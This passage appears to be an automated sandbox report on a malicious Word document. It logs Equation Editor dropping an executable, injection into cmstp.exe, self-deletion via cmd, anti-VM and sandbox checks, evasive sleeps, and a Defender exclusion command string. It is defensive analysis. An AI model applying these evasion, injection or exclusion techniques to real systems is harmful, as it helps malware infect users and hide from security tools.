Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AAFEA0 NtReadVirtualMemory,LdrInitializeThunk, 5_2_00AAFEA0
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AAFED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 5_2_00AAFED0
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AAFFB4 NtCreateSection,LdrInitializeThunk, 5_2_00AAFFB4
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AB10D0 NtOpenProcessToken, 5_2_00AB10D0
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AB0060 NtQuerySection, 5_2_00AB0060
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AB01D4 NtSetValueKey, 5_2_00AB01D4
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AB010C NtOpenDirectoryObject, 5_2_00AB010C
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AB1148 NtOpenThread, 5_2_00AB1148
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AAF8CC NtWaitForSingleObject, 5_2_00AAF8CC
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AAF938 NtWriteFile, 5_2_00AAF938
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AB1930 NtSetContextThread, 5_2_00AB1930
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AAFAB8 NtQueryValueKey, 5_2_00AAFAB8
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AAFA20 NtQueryInformationFile, 5_2_00AAFA20
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AAFA50 NtEnumerateValueKey, 5_2_00AAFA50
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AAFBE8 NtQueryVirtualMemory, 5_2_00AAFBE8
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AAFB50 NtCreateKey, 5_2_00AAFB50
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AAFC30 NtOpenProcess, 5_2_00AAFC30
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AAFC48 NtSetInformationFile, 5_2_00AAFC48
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AB0C40 NtGetContextThread, 5_2_00AB0C40
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AB1D80 NtSuspendThread, 5_2_00AB1D80
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AAFD5C NtEnumerateKey, 5_2_00AAFD5C
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AAFE24 NtWriteVirtualMemory, 5_2_00AAFE24
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AAFFFC NtCreateProcessEx, 5_2_00AAFFFC
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AAFF34 NtQueueApcThread, 5_2_00AAFF34
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00146F06 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose, 5_2_00146F06
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00146F12 NtQueryInformationProcess, 5_2_00146F12
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_020100C4 NtCreateFile,LdrInitializeThunk, 7_2_020100C4
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_020107AC NtCreateMutant,LdrInitializeThunk, 7_2_020107AC
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0200FAB8 NtQueryValueKey,LdrInitializeThunk, 7_2_0200FAB8
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0200FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 7_2_0200FAD0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0200FAE8 NtQueryInformationProcess,LdrInitializeThunk, 7_2_0200FAE8
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0200FB50 NtCreateKey,LdrInitializeThunk, 7_2_0200FB50
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0200FB68 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_0200FB68
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0200FBB8 NtQueryInformationToken,LdrInitializeThunk, 7_2_0200FBB8
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0200F900 NtReadFile,LdrInitializeThunk, 7_2_0200F900
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0200F9F0 NtClose,LdrInitializeThunk, 7_2_0200F9F0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0200FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 7_2_0200FED0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0200FFB4 NtCreateSection,LdrInitializeThunk, 7_2_0200FFB4
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0200FC60 NtMapViewOfSection,LdrInitializeThunk, 7_2_0200FC60
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0200FD8C NtDelayExecution,LdrInitializeThunk, 7_2_0200FD8C
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0200FDC0 NtQuerySystemInformation,LdrInitializeThunk, 7_2_0200FDC0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_02010048 NtProtectVirtualMemory, 7_2_02010048
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_02010060 NtQuerySection, 7_2_02010060
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_02010078 NtResumeThread, 7_2_02010078
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_020110D0 NtOpenProcessToken, 7_2_020110D0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0201010C NtOpenDirectoryObject, 7_2_0201010C
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_02011148 NtOpenThread, 7_2_02011148
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_020101D4 NtSetValueKey, 7_2_020101D4
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0200FA20 NtQueryInformationFile, 7_2_0200FA20
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0200FA50 NtEnumerateValueKey, 7_2_0200FA50
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0200FBE8 NtQueryVirtualMemory, 7_2_0200FBE8
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0200F8CC NtWaitForSingleObject, 7_2_0200F8CC
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_02011930 NtSetContextThread, 7_2_02011930
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0200F938 NtWriteFile, 7_2_0200F938
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0200FE24 NtWriteVirtualMemory, 7_2_0200FE24
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0200FEA0 NtReadVirtualMemory, 7_2_0200FEA0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0200FF34 NtQueueApcThread, 7_2_0200FF34
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0200FFFC NtCreateProcessEx, 7_2_0200FFFC
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0200FC30 NtOpenProcess, 7_2_0200FC30
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_02010C40 NtGetContextThread, 7_2_02010C40
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0200FC48 NtSetInformationFile, 7_2_0200FC48
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0200FC90 NtUnmapViewOfSection, 7_2_0200FC90
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0200FD5C NtEnumerateKey, 7_2_0200FD5C
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_02011D80 NtSuspendThread, 7_2_02011D80
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_000A85D0 NtCreateFile, 7_2_000A85D0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_000A8680 NtReadFile, 7_2_000A8680
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_000A8700 NtClose, 7_2_000A8700
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_000A87B0 NtAllocateVirtualMemory, 7_2_000A87B0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_000A85CA NtCreateFile, 7_2_000A85CA
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_000A86FA NtClose, 7_2_000A86FA
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_000A87AA NtAllocateVirtualMemory, 7_2_000A87AA
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: ~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Document contains no OLE stream with summary information
Source: ~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp.0.dr OLE indicator has summary info: false
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\cmstp.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\cmstp.exe Memory allocated: 76E90000 page execute and read and write
Source: ashlyzx[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: ashlkyvc7592.exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
Source: C:\Windows\SysWOW64\cmstp.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\ashlkyvc7592.exe"
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$O-5433ERE.doc
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD883.tmp
Source: classification engine Classification label: mal100.troj.expl.evad.winDOC@9/9@6/4
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: ~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp.0.dr OLE document summary: title field not present or empty
Source: ~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp.0.dr OLE document summary: author field not present or empty
Source: ~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp.0.dr OLE document summary: edited time not present or 0
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wntdll.pdb source: ashlkyvc7592.exe, ashlkyvc7592.exe, 00000005.00000003.424164499.00000000007B0000.00000004.00000001.sdmp, ashlkyvc7592.exe, 00000005.00000003.425110861.0000000000910000.00000004.00000001.sdmp, ashlkyvc7592.exe, 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, ashlkyvc7592.exe, 00000005.00000002.462140612.0000000000C20000.00000040.00000001.sdmp, cmstp.exe, cmstp.exe, 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, cmstp.exe, 00000007.00000003.462746039.0000000001E70000.00000004.00000001.sdmp, cmstp.exe, 00000007.00000003.461709967.00000000004F0000.00000004.00000001.sdmp, cmstp.exe, 00000007.00000002.686830161.0000000002180000.00000040.00000001.sdmp
Source: Binary string: cmstp.pdb source: ashlkyvc7592.exe, 00000005.00000002.461894500.00000000006D9000.00000004.00000020.sdmp, ashlkyvc7592.exe, 00000005.00000002.461761536.00000000003E0000.00000040.00020000.sdmp
Source: ~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp.0.dr Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

.NET source code contains potential unpacker
Source: ashlyzx[1].exe.2.dr, MegaMan.LevelEditor/MainForm.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: ashlkyvc7592.exe.2.dr, MegaMan.LevelEditor/MainForm.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 4.0.ashlkyvc7592.exe.60000.0.unpack, MegaMan.LevelEditor/MainForm.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 4.2.ashlkyvc7592.exe.60000.0.unpack, MegaMan.LevelEditor/MainForm.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.ashlkyvc7592.exe.60000.4.unpack, MegaMan.LevelEditor/MainForm.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.ashlkyvc7592.exe.60000.3.unpack, MegaMan.LevelEditor/MainForm.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.ashlkyvc7592.exe.60000.5.unpack, MegaMan.LevelEditor/MainForm.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.ashlkyvc7592.exe.60000.0.unpack, MegaMan.LevelEditor/MainForm.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.ashlkyvc7592.exe.60000.7.unpack, MegaMan.LevelEditor/MainForm.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.2.ashlkyvc7592.exe.60000.0.unpack, MegaMan.LevelEditor/MainForm.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.ashlkyvc7592.exe.60000.9.unpack, MegaMan.LevelEditor/MainForm.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.ashlkyvc7592.exe.60000.2.unpack, MegaMan.LevelEditor/MainForm.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.ashlkyvc7592.exe.60000.1.unpack, MegaMan.LevelEditor/MainForm.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 4_2_003412DD push esp; retn 002Dh 4_2_00341321
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 4_2_00343652 push esp; retn 002Dh 4_2_00343655
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_0041B87C push eax; ret 5_2_0041B882
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_0041B812 push eax; ret 5_2_0041B818
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_0041B81B push eax; ret 5_2_0041B882
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_004068A0 push es; retf 5_2_004068AF
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_0040697C push esi; ret 5_2_0040697D
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00414406 push B75A778Ch; ret 5_2_0041440B
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_0041CEBD push ebp; retf 5_2_0041CEBE
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_0041B7C5 push eax; ret 5_2_0041B818
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00414FF5 push ecx; ret 5_2_00414FF6
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00415FFA push ecx; iretd 5_2_00416004
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00ABDFA1 push ecx; ret 5_2_00ABDFB4
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0201DFA1 push ecx; ret 7_2_0201DFB4
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_000A4406 push B75A778Ch; ret 7_2_000A440B
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_000AB7C5 push eax; ret 7_2_000AB818
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_000AB81B push eax; ret 7_2_000AB882
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_000AB812 push eax; ret 7_2_000AB818
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_000AB87C push eax; ret 7_2_000AB882
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_000968A0 push es; retf 7_2_000968AF
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_000A8913 push ds; retn 4797h 7_2_000A891D
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0009697C push esi; ret 7_2_0009697D
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_000ACEBD push ebp; retf 7_2_000ACEBE
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_000A5FFA push ecx; iretd 7_2_000A6004
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_000A4FF5 push ecx; ret 7_2_000A4FF6
Source: initial sample Static PE information: section name: .text entropy: 7.66317958598

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ashlyzx[1].exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: 00000004.00000002.425463492.0000000002241000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.425537455.000000000225D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ashlkyvc7592.exe PID: 1528, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: ashlkyvc7592.exe, 00000004.00000002.425463492.0000000002241000.00000004.00000001.sdmp, ashlkyvc7592.exe, 00000004.00000002.425537455.000000000225D000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: ashlkyvc7592.exe, 00000004.00000002.425463492.0000000002241000.00000004.00000001.sdmp, ashlkyvc7592.exe, 00000004.00000002.425537455.000000000225D000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmstp.exe RDTSC instruction interceptor: First address: 0000000000098604 second address: 000000000009860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmstp.exe RDTSC instruction interceptor: First address: 000000000009898E second address: 0000000000098994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1184 Thread sleep time: -300000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe TID: 2672 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\cmstp.exe TID: 2988 Thread sleep time: -36000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\cmstp.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_004088C0 rdtsc 5_2_004088C0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Thread delayed: delay time: 922337203685477
Source: ashlkyvc7592.exe, 00000004.00000002.425537455.000000000225D000.00000004.00000001.sdmp Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: explorer.exe, 00000006.00000000.443682934.000000000457A000.00000004.00000001.sdmp Binary or memory string: ort\0000pciide\idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_
Source: explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.443682934.000000000457A000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: ashlkyvc7592.exe, 00000004.00000002.425537455.000000000225D000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: ashlkyvc7592.exe, 00000004.00000002.425537455.000000000225D000.00000004.00000001.sdmp Binary or memory string: vmware
